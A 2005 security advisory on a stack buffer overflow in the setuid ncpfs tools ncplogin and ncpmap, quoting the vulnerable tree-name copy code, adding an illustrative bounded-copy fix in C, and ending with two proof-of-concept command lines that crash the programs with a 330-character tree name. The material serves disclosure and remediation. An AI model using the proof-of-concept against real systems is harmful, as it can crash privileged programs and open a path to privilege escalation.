Saturday, 10 September 2005
Summary
The ncplogin command is used to create a permanent connection to a NetWare server. Permanent connections stay connected even when no application is using them.
By passing an overly long tree name (the -T argument) to ncplogin or ncpmap, it is possible to crash the program and possibly gain higher privileges.
Credit:
The information has been provided by Karol Więsek.
Details
Vulnerable Systems:
* ncpfs version 2.2.4-1 from Fedora Core 2
Both ncplogin and ncpmap are installed setuid by default, so a successful exploit runs with the elevated privileges of the setuid binary.
Vulnerable Code:
From nwclient.c (strcpy_cw widens each byte into a wchar_t with no length limit; the tree name is copied into a fixed stack buffer of MAX_DN_CHARS+1 wide characters without any length check):

    static void strcpy_cw(wchar_t *w, const char* s) {
        while ((*w++ = *(const nuint8*)s++) != 0);
    }

    NWDSCCODE NWDSCreateContextHandleMnt(NWDSContextHandle* ctx, const NWDSChar * treeName){
        ...
        wchar_t wc_treeName[MAX_DN_CHARS+1];
        if (!treeName)
            return ERR_NULL_POINTER;
        strcpy_cw (wc_treeName,treeName);
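As an added illustration of the fix, not code from ncpfs or from the advisory, the following C shows a bounded replacement for strcpy_cw that rejects a tree name that would not fit in the destination instead of writing past it. The value of MAX_DN_CHARS (256 here), the error code names ERR_NULL_POINTER and ERR_NAME_TOO_LONG, and the function names strcpy_cw_bounded, create_context_tree_name and check_tree_name_of_length are assumptions made for this example; the real ncpfs constants and NWDSCCODE values live in its headers, not on this page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* Assumed for this example; the real constant is defined in ncpfs headers. */
#define MAX_DN_CHARS 256

/* Placeholder error codes; ncpfs uses its own NWDSCCODE values. */
#define ERR_NULL_POINTER  (-1)
#define ERR_NAME_TOO_LONG (-2)

/* Bounded version of strcpy_cw: widens each byte into a wchar_t like the
 * original, but never writes more than cap elements. Returns 0 when the
 * whole string (terminator included) fit, ERR_NAME_TOO_LONG otherwise.
 * On failure the destination is left as an empty string: a silently
 * truncated tree name could select the wrong tree, so we refuse it. */
static int strcpy_cw_bounded(wchar_t *w, size_t cap, const char *s) {
    size_t i;
    if (cap == 0)
        return ERR_NAME_TOO_LONG;
    for (i = 0; i < cap; i++) {
        w[i] = (wchar_t)(uint8_t)s[i];
        if (s[i] == '\0')
            return 0;
    }
    w[0] = L'\0';
    return ERR_NAME_TOO_LONG;
}

/* Mirrors the prologue of NWDSCreateContextHandleMnt with the length
 * check in place. Returns a negative error code, or on success the
 * number of characters copied into the stack buffer. */
int create_context_tree_name(const char *treeName) {
    wchar_t wc_treeName[MAX_DN_CHARS + 1];
    int rc;
    if (!treeName)
        return ERR_NULL_POINTER;
    rc = strcpy_cw_bounded(wc_treeName, MAX_DN_CHARS + 1, treeName);
    if (rc != 0)
        return rc;
    /* ... context setup would continue here with a safely bounded copy. */
    return (int)wcslen(wc_treeName);
}

/* Constructs a tree name of `len` 'a' characters (the shape of the
 * advisory's perl one-liner) and reports how the checked path handles it. */
int check_tree_name_of_length(size_t len) {
    char buf[1024];
    if (len >= sizeof buf)
        return ERR_NAME_TOO_LONG;
    memset(buf, 'a', len);
    buf[len] = '\0';
    return create_context_tree_name(buf);
}

int main(void) {
    printf("330 chars  -> %d (expect ERR_NAME_TOO_LONG=%d)\n",
           check_tree_name_of_length(330), ERR_NAME_TOO_LONG);
    printf("256 chars  -> %d (expect 256)\n", check_tree_name_of_length(256));
    printf("CORP_TREE  -> %d (expect 9)\n", create_context_tree_name("CORP_TREE"));
    return 0;
}
```

The key difference from the original is that the copy loop is driven by the destination capacity rather than by the input's terminator, so the 330-character argument from the proof of concept is rejected with an error code before anything is written beyond the buffer.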
Proof of Concept:
The following two command lines trigger the vulnerability:
ncplogin -T `perl -e {print"a"x"330"}`
ncpmap -T `perl -e {print"a"x"330"}` /